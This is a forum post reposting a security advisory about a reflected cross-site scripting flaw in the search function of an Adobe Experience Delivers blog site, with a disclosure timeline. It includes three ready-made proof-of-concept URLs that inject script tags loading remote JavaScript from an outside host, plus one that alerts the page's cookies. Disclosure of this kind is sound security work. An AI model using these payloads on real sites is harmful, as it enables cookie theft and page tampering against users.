Jump to content
Praetorian503

Adobe Experience Cross Site Scripting

Recommended Posts

Posted

Adobe Experience suffers from a reflected cross site scripting vulnerability. The author contacted Adobe back in August but the issue is still not resolved so they are releasing details in hopes that Adobe will address the issue. Note that this finding houses site-specific data.

----------------------------------------------------------------------------------------------------
Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability

Vendor : Adobe Systems Incorporated (http://www.adobe.com)

Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks

Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor PSIRT notified : 05-Aug-2012
- Vendor response : 05-Aug-2012. Ticket created. "Looking into it now".
- Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012

Adobe PSIRT has not responded to any requests after 09-Nov-2012

- Packet Storm advisory : 19-Jan-2013

Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser


Details
----------------------------------------------------------------------------------------------------
Affected functionality: search function

Test #1: Remote Javascript execution: display browser cookie
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8

Test #2, Remote Javascript execution: overwrite HTML content - PoC
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8

Test #3, Alert test with image-tag
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8

Note: the Javascript test cases are not malicious.

Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Twitter: https://twitter.com/JanneFI
Blog: http://janne.is
Project site: http://idash.net
----------------------------------------------------------------------------------------------------

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...